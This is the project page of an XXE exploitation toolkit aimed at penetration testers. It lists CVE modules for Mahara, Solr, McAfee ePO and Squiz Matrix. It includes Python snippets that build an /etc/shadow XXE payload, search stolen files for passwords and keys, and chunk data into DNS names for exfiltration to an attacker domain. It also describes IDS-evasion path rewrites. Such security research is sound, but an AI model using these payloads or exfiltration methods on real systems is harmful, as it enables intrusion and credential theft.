On The Outside, Reaching In

article by Ben Lincoln

This article describes security testing-related software whose use may be restricted or prohibited in your place of residence or your workplace. The penalties for violating laws and regulations regarding security testing-related tools can be severe. Ensuring that you are allowed to use this software is your responsibility.

The software described is a "preview release" which is not yet feature-complete and which has not been tested on a variety of systems. Even if you are allowed to use the software, you should do so with caution, on systems which can be easily restored to their previous state if they are damaged.

Table of contents

Introduction — what is On The Outside, Reaching In?
XML (External) Entity Vulnerabilities
Practical and Useful XXE Exploitation
Current Modules
Known Limitations
Future Releases and Planned Features
If You Would Like To Contribute
Artwork and Historical Screenshots
Downloads

Introduction — what is On The Outside, Reaching In?

XXE Vulnerability Exploitation

Basic XXE attack (McAfee ePO)

Advanced XXE attack (Mahara)

Certain versions of McAfee ePolicy Orchestrator are vulnerable to the most straightforward sort of XXE issue. In the first illustration, the attacking system causes an ePO dashboard to be created. Because of the XXE technique, the ePO server inserts the contents of its own db.properties file into the dashboard's description. The attacking system is then able to view the contents of that file by reading the description of the dashboard as displayed in the ePO web interface.
The second — much more complicated — series of diagrams illustrates the basic concept described by Timur Yunusov and Alexey Osipov in their whitepaper on out-of-band XXE techniques and the slides from the corresponding BlackHat EU 2013 presentation.
In short, the vulnerable Mahara CMS is tricked into sending the contents of a sensitive file to a malicious webserver acting on behalf of the attacker.
For more technical readers, the out-of-band data is generally base64-encoded — among other things, this allows for binary data to be retrieved.

On The Outside, Reaching In is a Python-based toolbox intended to allow useful exploitation of XML external entity ("XXE") vulnerabilities.

In the current release, it has two major functions:

Read certain categories of file via the target system (either from the target's filesystem, or via HTTP calls to other systems accessible to the target).
Trigger memory-exhaustion denial-of-service conditions in certain vulnerable targets.

In the future it may be extended to enable similar functionality for the general class of local and remote file-inclusion vulnerabilities. See Future Releases and Planned Features.

Conceptually, it is similar to the Metasploit Framework: it provides a package of related exploits built around a common core, so new exploits of similar types can be developed quickly because so much of the code is reusable. The specifics of exploitation are significantly different, however.

XML (External) Entity Vulnerabilities

(This is a brief summary - for a detailed explanation, see OWASP's XML External Entity (XXE) Processing and Microsoft's XML Denial of Service Attacks and Defenses.)

XML (a widely-used — especially in so-called "enterprise" software — markup language) contains a feature called an "entity", which is basically a placeholder (or, for developers, a constant) that is defined once and then referenced later in the document. For example, if I am writing a boilerplate contract, I can define an entity named &companyname; with the value Spectre Security Products at the beginning of the document, and then use &companyname; wherever the contract would normally contain the actual company name (Spectre Security Products). When I have need for an identical contract for a different company (Universal Exports), I update the definition of &companyname; at the beginning of the document, and my work is finished.
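As a minimal sketch of the contract example, the following Python snippet declares companyname in an internal DTD subset and lets the standard-library xml.etree.ElementTree parser expand it. The element names (contract, party, clause) and the function name are made up for illustration.

```python
import xml.etree.ElementTree as ET

# Hypothetical contract document; the element names are illustrative only.
CONTRACT_XML = """<?xml version="1.0"?>
<!DOCTYPE contract [
  <!ENTITY companyname "Spectre Security Products">
]>
<contract>
  <party>&companyname;</party>
  <clause>&companyname; agrees to the terms below.</clause>
</contract>"""


def expand_contract(xml_text):
    """Parse the document and return the expanded text of each child element."""
    root = ET.fromstring(xml_text)
    return [child.text for child in root]


if __name__ == "__main__":
    for line in expand_contract(CONTRACT_XML):
        print(line)
```

Changing the single ENTITY declaration to Universal Exports changes every place the entity is referenced, which is the "define once, use many times" behaviour described above.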

This type of entity can be misused in several XML libraries to cause the target system to run out of memory. The specific techniques are commonly known as "Billion Laughs" and "Quadratic Blowup", and both are described in detail in the OWASP and Microsoft documents. I am generally uninterested in denial-of-service attacks, but included the capability in On The Outside, Reaching In because it was nearly "free" in terms of development effort and may be useful in certain cases.
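To show why these two techniques exhaust memory, here is a small arithmetic sketch in Python. It only computes the size of the expanded text and builds no document. The function names are hypothetical, and the default numbers (a three-character base string, ten references per level, nine levels, and a 50,000-character entity) are illustrative values rather than anything taken from the tool.

```python
def billion_laughs_size(base_len=3, refs_per_level=10, levels=9):
    """Expanded length for nested entities.

    Each level's entity references the previous level's entity
    refs_per_level times, so the size grows exponentially with depth.
    """
    return base_len * refs_per_level ** levels


def quadratic_blowup_size(entity_len, references):
    """Expanded length for one long entity referenced many times.

    There is no nesting here: the document is roughly
    entity_len + references characters long, but expands to their product.
    """
    return entity_len * references


if __name__ == "__main__":
    print("Billion Laughs:", billion_laughs_size(), "characters")
    print("Quadratic Blowup:", quadratic_blowup_size(50000, 50000), "characters")
```

In both cases a document of a few kilobytes (or a few hundred kilobytes) asks the parser to hold gigabytes of text.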

Where XML entities become interesting (in my opinion) is that the specification also defines what's called an "external entity". As the name implies, this is a reference to information which is stored outside of the XML document. Perhaps the author wants to refer to an image or a table of data maintained by someone else, and this extension of the entity concept allows that to take place, rather than copying the information into the new document.

This aspect of the XML specification frequently results in behaviour which is unexpected by the developers using XML libraries, partly because XML has been used for so many types of application in the last 10+ years. Numerous web applications and services receive commands and requests formatted as XML documents. Many of them will internally parse the XML document (which, among other things, usually involves "entity expansion" - replacing the placeholders with the actual value defined for them) and then take action based on the parsed version of the data.

For example, perhaps I have written a web-based document library which allows content to be uploaded in the form of XML files. This library receives the files, resolves any entities, and then stores the result for viewing via web browser. But what if one of the entities is a reference to the external file /etc/shadow, and I have made the mistake of configuring the application to run as the root user? If I (the developer) have not designed my system with security in mind, the browsable version of the document now contains a list of all of the user accounts on the system and their password hashes. The first illustration above is of this type of scenario.
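The document-library scenario can be sketched as follows. This Python helper only builds the text of an XML document that declares an external entity and references it in the body. It does not send anything, and it is not code from On The Outside, Reaching In. The function name, the entity name xxe, and the root element name document are assumptions chosen for illustration.

```python
def build_xxe_document(target_uri, entity_name="xxe", root_element="document"):
    """Return an XML document whose body references an external entity.

    A parser that resolves external entities would replace the reference
    with whatever target_uri points to.
    """
    if '"' in target_uri:
        # The URI is placed inside a double-quoted system literal.
        raise ValueError("target_uri must not contain a double quote")
    return (
        '<?xml version="1.0"?>\n'
        '<!DOCTYPE {root} [\n'
        '  <!ENTITY {name} SYSTEM "{uri}">\n'
        ']>\n'
        '<{root}>&{name};</{root}>\n'
    ).format(root=root_element, name=entity_name, uri=target_uri)


if __name__ == "__main__":
    print(build_xxe_document("file:///etc/shadow"))
```

The only difference from an ordinary internal entity is the SYSTEM keyword followed by a URI instead of a literal value.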

Nearly every XML library allows for this kind of inclusion of files by exact name. This is still very useful to an attacker, but requires the target file's path to be known or guessed. The Java XML library goes one step further and actually allows directory contents to be listed by the same means, so vulnerable applications written in Java can be used to obtain nearly all of the text-based files from the target system.

This type of vulnerability has been understood since 2002 or earlier, but is still surprisingly common — possibly because of the lack of useful automated tools for exploiting such vulnerabilities.

Some vulnerabilities require much more complicated techniques to exploit. The second illustration above shows the most elaborate method used by the initial release of On The Outside, Reaching In. It involves working together with an instance of She Wore A Mirrored Mask to perform Yunusov-Osipov-style data exfiltration^[2].

Practical and Useful XXE Exploitation

Traditionally, XXE exploitation has generally involved single files (the most common example being /etc/passwd as a proof-of-concept of a vulnerability on a Linux or Unix system). While this can be very useful, I believe that realizing the full potential of XXE necessarily involves automation to obtain as many potentially-valuable files from the target system as possible.

In the case of Linux and Unix, the culture of that world is such that administrators will often put sensitive, valuable data in text files protected only by filesystem permissions:

Database credentials and/or connection strings.
SSH private keys.
TLS/SSL certificates and their private keys.
Lists of valid usernames.
Configuration files.
System information (from /proc).
Information about installed software and other components (which may reveal vulnerabilities).

Even if the filesystem permissions are correct (which in my experience is rarely the case), if a PHP-based web application is running as a specific non-privileged account, that account will still almost always have read access to the file containing its own database connection information (including the password).

On The Outside, Reaching In provides the ability to take full advantage of this concept in the form of its --clone mode. Grab all the files you can, and then use grep or your favourite tool to search for information that will reveal further vulnerabilities.
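As a rough Python alternative to grep for the "search afterwards" step, the sketch below walks a directory of retrieved files and reports lines that match a pattern. It is written for Python 3 (the tool itself targets Python 2.7), and the function name, the default pattern, and the idea that the retrieved files sit in one local directory tree are all assumptions for illustration.

```python
import os
import re

# Illustrative pattern only; adjust it to whatever is worth finding.
DEFAULT_PATTERN = re.compile(
    r"(password|passwd|secret|BEGIN [A-Z ]*PRIVATE KEY)", re.IGNORECASE
)


def search_cloned_tree(root_dir, pattern=DEFAULT_PATTERN):
    """Yield (path, line_number, line) for every matching line under root_dir."""
    for dirpath, _dirnames, filenames in os.walk(root_dir):
        for name in sorted(filenames):
            path = os.path.join(dirpath, name)
            try:
                # errors="replace" keeps binary or oddly-encoded files from
                # aborting the search.
                with open(path, "r", errors="replace") as handle:
                    for number, line in enumerate(handle, start=1):
                        if pattern.search(line):
                            yield path, number, line.rstrip("\n")
            except OSError:
                # Unreadable file: skip it and carry on.
                continue


if __name__ == "__main__":
    for path, number, line in search_cloned_tree("."):
        print("{}:{}: {}".format(path, number, line))
```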

Because XML external entities are referenced in the form of URIs, the potential exists not only to access content from the target server's filesystem, but also to use that target server as a reverse HTTP proxy into the environment that is hosting it (including any HTTP-based services running on the target server's loopback address or blocked from direct connectivity by a firewall). In other words, instead of specifying file:///etc/passwd for the external entity, imagine the possibilities for URIs like http://127.0.0.1:8080/servlet/SnoopServlet, https://intranet.local/confidential/blueprints/DeathStar.dwg, or ftp://ftp.local/bank_account_list.txt. Those URIs are accessed not by the attacker's system (which hopefully has no network-level access to any of them), but by the exposed server with an XXE vulnerability, which is on the same (hypothetical) network as the sensitive internal resources those URIs point to.

On The Outside, Reaching In can access intranet URIs of that type today, as long as the full paths are known. A feature is planned for a future release which would allow it to function as an HTTP proxy for web browsers and other HTTP-based pen-testing tools. This would allow interactive browsing and spidering of that content as well.

Current Modules

The current release of On The Outside, Reaching In includes the following modules:

CVE-2012-2239 - Mahara 1.4.x before 1.4.4, and 1.5.x before 1.5.3 (dependent on libxml2 version as well)
All modules involve pointing an RSS feed-reader object to a malicious RSS feed hosted using She Wore A Mirrored Mask, and exfiltrate data using a Yunusov-Osipov out-of-band technique^[2].
Valid Mahara credentials are required. In most cases, even standard user credentials should be sufficient (in other words, administrative credentials will work, but should not be required).
Mahara is a PHP-based application, so it is possible to obtain binary files as well as text, although on most systems the maximum file size that can be retrieved is about 2KiB. Larger files will not be returned.
To my knowledge, On The Outside, Reaching In was the first public source of working exploit code for this vulnerability.
In early June 2014, libxml2 was updated in a way that prevents this set of modules from working. For example, 2.7.8.dfsg-5.1ubuntu4.6 will allow these modules to function, but 2.7.8.dfsg-5.1ubuntu4.8 will not.
- CVE-2012-2239-ME - Modify the configuration of an RSS feed-reader on an existing page, then attempt to reset it to its original state once exploitation is complete. (1.4.3 and 1.5.2) [ Module created: 2014-03-22 ]
- CVE-2012-2239-PC-A - Create a new page (using administrative credentials), and attempt to delete it when exploitation is complete. (1.4.3 only for now) [ Module created: 2014-03-22 ]
- CVE-2012-2239-PC-U - Create a new page (using standard user credentials), and attempt to delete it when exploitation is complete. (1.4.3 only for now) [ Module created: 2014-03-22 ]
See OTORI - Example 3: Mahara for a detailed tutorial regarding these modules.
CVE-2013-6407 - Apache Solr (note: CVE-2013-6408 arguably also applies in some cases)
Three distinct vulnerabilities are exploited, giving pen-testers maximum flexibility if the system administrator has disabled access to some functionality.
Valid Solr credentials are not required.
Solr is a Java-based application, so only ASCII text can be retrieved. In addition, due to the specifics of the vulnerabilities, ASCII text which contains XML/HTML markup cannot be retrieved. There does not appear to be a practical limit on the size of files which can be obtained.
To my knowledge, On The Outside, Reaching In was the first public source of working exploit code for these vulnerabilities.
- CVE-2013-6407-DARH - for Solr versions up to and including 4.3.0. Submits a crafted XML document for analysis (not storage), with the XXE-based content being immediately reflected back in the response from the server. This is the fastest Solr-related module, and works with the largest number of versions. This should be the preferred Solr-exploitation module unless the system administrator has disabled access to the Document Analysis Request Handler or it is paramount to avoid leaving error messages in the Solr log files. [ Module created: 2014-02-15 ]
- CVE-2013-6407-URH-DI - for Solr versions up to and including 4.0.0. Inserts a crafted document into the Solr index, queries Solr to retrieve the document content (which contains the XXE-based data), then attempts to delete that document. This is the slowest Solr-related module. It is the least likely to generate potentially-suspicious error messages in the Solr logs. [ Module created: 2014-02-15 ]
- CVE-2013-6407-URH-NMVF - for Solr versions up to and including 4.0.0. Attempts to insert a crafted document into the Solr index, but the document is designed to violate a constraint against a particular field containing multiple values. The insert will fail, and the XXE-based content is immediately reflected back in the server response. [ Module created: 2014-02-15 ]
See OTORI - Example 1: Apache Solr for a detailed tutorial regarding these modules.
CVE-2014-2205 - McAfee ePolicy Orchestrator from 4.6.0 to 4.6.7 (without Hotfix 940148) (note: only tested with version 4.6.4)
Valid ePO credentials are required, and the user account must have permission to import and view dashboards.
ePO is a (partly?) Java-based application, so generally only ASCII text can be retrieved. In addition, there are two quirks due to bugs/fully intentional, expected behaviour of ePO:
1. The maximum file size which can be retrieved is around 1KiB. Larger files will be truncated, and will contain a chunk of the dashboard definition appended to the actual content.
2. The first four characters of each file will be replaced with the fifth through eighth characters of the same file.
This vulnerability was disclosed by RedTeam Pentesting GmbH, and this module uses a method similar to the one in their example code.
- CVE-2014-2205-D - Uploads a crafted dashboard definition whose Description field contains the XXE exploit, views the dashboard, then attempts to delete it. [ Module created: 2014-05-26 ]
See OTORI - Example 4: McAfee ePO for a detailed tutorial regarding this module, including a walkthrough of how to obtain the ePO database credentials.
SOS-12-007 - Squiz Matrix prior to version 4.6.5/4.8.1 (note: only tested with version 4.6.3)
All modules involve making crafted requests (requests for an asset map, by default) to the Squiz instance. She Wore A Mirrored Mask is required for all three, because the vulnerability is triggered using a Yunusov-Osipov technique (entities nested via external XML fragment references)^[2].
Valid Squiz Matrix credentials are not required.
Squiz Matrix is a PHP-based application, so it is possible to obtain binary files as well as text, although on most systems the maximum file size that can be retrieved is about 2KiB. Larger files will not be returned.
This vulnerability was disclosed by Nadeem Salim from Sense of Security Labs, and this module uses a method similar to the one in Nadeem's example code.
- SOS-12-007-YU-404 - Makes a request referring to a non-existent page. The XXE-based content is reflected back in the response. [ Module created: 2014-03-16 ]
- SOS-12-007-YU-IU - Makes a request involving an invalid URI. The XXE-based content is reflected back in the response. [ Module created: 2014-03-16 ]
- SOS-12-007-YU-OOB - Makes a valid request, with the XXE-based content being exfiltrated using a Yunusov-Osipov out-of-band technique^[2]. This is the most reliable and most flexible of the Squiz Matrix modules. The other two are included mainly for tutorial purposes, although they may be able to retrieve slightly larger (a few bytes) files in some edge cases. [ Module created: 2014-03-16 ]
See OTORI - Example 2: Squiz Matrix for a detailed tutorial regarding these modules.
Generic XXE modules (for copy/pasting requests from an intercepting proxy)
- G-XXE-Basic — basic request with XXE content in the body of the response [ Module created: 2014-07-20 ]
- G-XXE-YO — Yunusov-Osipov-style out-of-band [ Module created: 2014-07-20 ]
See OTORI - Example 7: Generic XXE Modules for a detailed tutorial regarding these modules.
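The two ePO quirks listed under CVE-2014-2205 above can make a retrieved file look corrupted at first glance. As an aid to recognising them, this Python sketch models what a file's content would look like after passing through those quirks. It is a simulation based only on the description in this article, not code from the tool. The function name and the exact 1024-character cutoff are assumptions ("around 1KiB" is all that is stated), and the fragment of dashboard definition that gets appended to truncated files is not modelled.

```python
def simulate_epo_quirks(content, max_len=1024):
    """Return content as it might appear when retrieved through ePO.

    Quirk 1: content beyond roughly max_len characters is lost.
    Quirk 2: the first four characters are replaced by characters
             five through eight of the same file.
    """
    truncated = content[:max_len]
    if len(truncated) < 8:
        # The article does not describe behaviour for very short files,
        # so they are returned unchanged here.
        return truncated
    return truncated[4:8] + truncated[4:]


if __name__ == "__main__":
    print(simulate_epo_quirks("abcdefghij"))
```

The practical consequence is that the first four characters of every file are unrecoverable, so a value such as a property name at the very start of a file has to be inferred from context.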

Known Limitations

In the interest of making a potentially-useful tool available sooner rather than later, the current release of On The Outside, Reaching In is a preview which has significant missing functionality compared to the intended "feature-complete" alpha release of the shiny chrome-plated future:

Ten working exploits for one commercial product (McAfee ePO 4.6.0 - 4.6.7) and three open-source software packages (Apache Solr, Squiz Matrix, and Mahara) are included. Eventually this number should be far higher.
No exploits for systems using Microsoft's XML libraries (SharePoint, etc.) are included (yet). SharePoint itself included a gaping XXE vulnerability up until 2011 (see MS11-074 for details). However, while it's so easy to exploit by hand that even a child could almost do it, trying to automate the process using raw HTTP requests reveals yet another case where beneath its simple-to-use surface, SharePoint is a daunting maze of unexpected complexity.
Built-in support for the use of an explicit HTTP proxy is not included. However, you can use tools like proxychains to connect through a proxy. I recommend proxychains-ng / proxychains4, which I have tested successfully for this purpose (specifically, version 4.7).
Built-in support for HTTP authentication is not included. If you need to connect to a system configured for HTTP authentication, you can use proxychains-ng / proxychains4 to connect through Burp Suite, and configure Burp Suite to handle platform authentication.
While most of the requests sent across the network are designed to be randomized and therefore more difficult for IDS/IPS devices to detect, some of the content (especially more-recently-developed content) is somewhat predictable - in particular, the RSS feed used by the Mahara modules.
It has been tested only on Linux (specifically, Debian 7 x64 and Kali Linux 1.0 x64).
It has been tested only using Python 2.7.3 (the current default on both test platforms). I briefly tried using it under Python 2.6.5 (the "current" version on my BackTrack 5 VM), and it failed to run due to some of the string-formatting code.
It pretends it is capable of HTTP 1.1 requests, but does not support connection re-use.
This software has not been tested with IPv6.

In addition, each flavour of XML library as well as the vulnerable software introduces its own limitations on the capabilities of this type of tool.

Java-based systems typically allow directories to be enumerated, and the included Apache Solr module allows this to be exploited. Although the filesize for content retrieved via this module is effectively unlimited, only text files with no XML markup can be retrieved due to the XML schema which Solr uses.
PHP-based vulnerable systems typically allow binary content to be retrieved (because PHP includes a handy (for attackers) function that base64-encodes such data), but the maximum file size is typically about 4K unless it was built with customized compiler flags.
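The reason base64 encoding matters for binary content can be shown with a short round trip. This is a Python 3 sketch using only the standard base64 module. The function names are hypothetical, and nothing here reflects how the tool itself handles the data internally.

```python
import base64


def encode_for_transport(raw_bytes):
    """Encode arbitrary bytes as ASCII text that is safe to embed in XML."""
    return base64.b64encode(raw_bytes).decode("ascii")


def decode_retrieved(encoded_text):
    """Recover the original bytes, ignoring any stray whitespace."""
    cleaned = "".join(encoded_text.split())
    return base64.b64decode(cleaned)


if __name__ == "__main__":
    original = bytes(range(256))  # every possible byte value
    encoded = encode_for_transport(original)
    assert decode_retrieved(encoded) == original
    print(len(original), "bytes became", len(encoded), "characters")
```

Every three bytes of input become four characters of output, so the encoded form is about a third larger than the file it carries.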

See the documentation for individual modules for more details.

Future Releases and Planned Features

Some of the things I'd like to include in future releases (not in any particular order):

Completely replace the use of httplib with the pen-testing-friendly equivalent discussed above.
Automatically launch a basic SWAMM instance to streamline the most common use of that tool.
URI-specific basic IDS/IPS signature evasion. For example, if the current URI to be requested is file:///etc/shadow, then randomly transform it into something like file:///etc/default/../shadow, file:///var/tmp/../log/../etc/default/../shadow, or file:///var/tmp/%2e%2e/log/%2e.%2fetc/default%2f2e./%73%68%61%64%6f%77.
The optional ability to specify module options using name/value pairs instead of the current position-based system.
Variable support for URI lists (e.g. a list is provided of the content of a typical Apache Tomcat directory structure, it begins with file:///%BASEPATH%/, and at runtime the value for that variable is specified so the user doesn't have to generate their own list file every time).
Filtered view of modules based on search or other criteria (e.g. what functionality the module supports).
Separate groupings of modules for mainline, community-contributed, and user-developed (to avoid stomping on users' files when they upgrade).
An option to profile the target (attempt to determine the OS, system specs, etc.).
Correct HTTP 1.1 operation (pipelining, etc.).
Native proxy support.
Authentication (NTLM, Kerberos, etc.) for both webservers and proxies.
Fix the --noemptydirs option so that it works as expected in --exacturilist mode.
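The planned variable support for URI lists could work along these lines. This is a speculative Python sketch of a feature that does not exist yet, so the function name, the one-URI-per-line input, and the handling of slashes are all assumptions. Only the %BASEPATH% placeholder syntax comes from the description above.

```python
def expand_uri_list(template_lines, variables):
    """Replace %NAME% placeholders in each non-empty template line.

    Leading and trailing slashes are stripped from each value so that a
    template such as file:///%BASEPATH%/conf does not end up with doubled
    slashes (an assumption about how the templates would be written).
    """
    expanded = []
    for line in template_lines:
        line = line.strip()
        if not line:
            continue
        for name, value in variables.items():
            line = line.replace("%" + name + "%", value.strip("/"))
        expanded.append(line)
    return expanded


if __name__ == "__main__":
    template = [
        "file:///%BASEPATH%/conf/server.xml",
        "file:///%BASEPATH%/conf/tomcat-users.xml",
    ]
    for uri in expand_uri_list(template, {"BASEPATH": "/opt/tomcat"}):
        print(uri)
```

Because only exact %NAME% tokens are replaced, percent-encoded sequences such as %2e in a URI are left alone.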

It would be tough to integrate into this particular tool (it would require the DNS equivalent of She Wore A Mirrored Mask, for one thing), but I like the idea of doing a combined XXE + DNS-tunneling data exfiltration. For example, the system that has the data does not have internet access of any kind, but it can make calls to a vulnerable Solr server which is allowed to perform DNS lookups against a DNS server which is configured in the standard way (i.e. it can make requests to DNS servers on the internet). The data is chunked and encoded as a series of base32 values of length 63 characters or less, which have a domain name belonging to the attacker appended (e.g. kle14l5a14a14355al55312qpbgah1355hgal55al515la5351la31bgl145a34.sll2454a52423524qbnau34labiweaalbuayk51i545bh14k3hb51w43kba145b.chunk000047.dnstunnel.reallycleverplan.com, etc.). Solr is made to attempt to load content from each of those domains (by using --exacturilist mode with a series of URIs like http://kle84l5a84a84375al75382qpbgah8357hgal57al785la7358la68bgl847a64.sll9474a79496794qbnau64labiweaalbuayk78i547bh84k6hb78w46kba847b.chunk000047.dnstunnel.reallycleverplan.com/do_not_care_if_this_exists_or_not.html, etc.). It doesn't have to succeed at loading the content (although getting an HTTP response of some kind instead of a timeout will make it run much faster), but just by performing the DNS lookup, it will cause the encoded data to be sent to the authoritative DNS server for the domain in question (which would be running the aforementioned DNS equivalent of She Wore A Mirrored Mask). The encoded data can then be re-assembled into the original file.
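The chunking and re-assembly steps of that idea can be sketched in Python 3 as follows. This covers only the encoding arithmetic: it performs no DNS lookups and is not part of the tool. The function names, the 70-byte chunk size, and the placeholder domain dnstunnel.example.com are assumptions. The 63-character label limit and the chunkNNNNNN sequence label follow the description above.

```python
import base64

MAX_LABEL = 63  # DNS limit on the length of a single label


def encode_chunks(data, domain, bytes_per_chunk=70):
    """Split data into chunks and encode each one as a DNS name under domain."""
    names = []
    for offset in range(0, len(data), bytes_per_chunk):
        chunk = data[offset:offset + bytes_per_chunk]
        # base32 survives DNS case-insensitivity; padding is dropped because
        # "=" is not valid in a hostname.
        encoded = base64.b32encode(chunk).decode("ascii").rstrip("=").lower()
        labels = [encoded[i:i + MAX_LABEL]
                  for i in range(0, len(encoded), MAX_LABEL)]
        sequence = "chunk{:06d}".format(offset // bytes_per_chunk)
        names.append(".".join(labels + [sequence, domain]))
    return names


def decode_chunks(names, domain):
    """Reassemble the original bytes from names produced by encode_chunks."""
    suffix = "." + domain
    pieces = {}
    for name in names:
        labels = name[:-len(suffix)].split(".")
        sequence = int(labels[-1][len("chunk"):])
        encoded = "".join(labels[:-1]).upper()
        encoded += "=" * (-len(encoded) % 8)  # restore the stripped padding
        pieces[sequence] = base64.b32decode(encoded)
    # Lookups may arrive out of order, so sort by sequence number.
    return b"".join(pieces[key] for key in sorted(pieces))


if __name__ == "__main__":
    secret = b"example file content " * 10
    names = encode_chunks(secret, "dnstunnel.example.com")
    assert decode_chunks(reversed(names), "dnstunnel.example.com") == secret
    print(names[0])
```

With 70 bytes per chunk, each chunk encodes to 112 base32 characters, which fits in two labels and keeps the full name well under the 253-character limit for a domain name.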

If You Would Like To Contribute

Please get in touch with me using the Contact form.

Artwork and Historical Screenshots

Screenshot of the highest-resolution banner

First successful out-of-band binary file download

Higher-resolution version of the icon/banner artwork (ANSI art version)

Higher-resolution version of the icon/banner artwork

Downloads

Download
File	Size	Version	Release Date	Author
On The Outside, Reaching In	4 MiB	0.3	2014-07-20	Ben Lincoln

Download
File	Size	Version	Release Date	Author
On The Outside, Reaching In	4 MiB	0.2.1	2014-06-22	Ben Lincoln
Includes several lists for scraping /proc on Linux target systems.

Download
File	Size	Version	Release Date	Author
On The Outside, Reaching In	343 KiB	0.2	2014-06-15	Ben Lincoln

Footnotes

1.	Some of the diagrams on this page contain OpenOffice/LibreOffice Draw shapes created by Frank Ebert.
2.	See the whitepaper by Timur Yunusov and Alexey Osipov and the slides from the corresponding BlackHat EU 2013 presentation - also by Timur Yunusov and Alexey Osipov.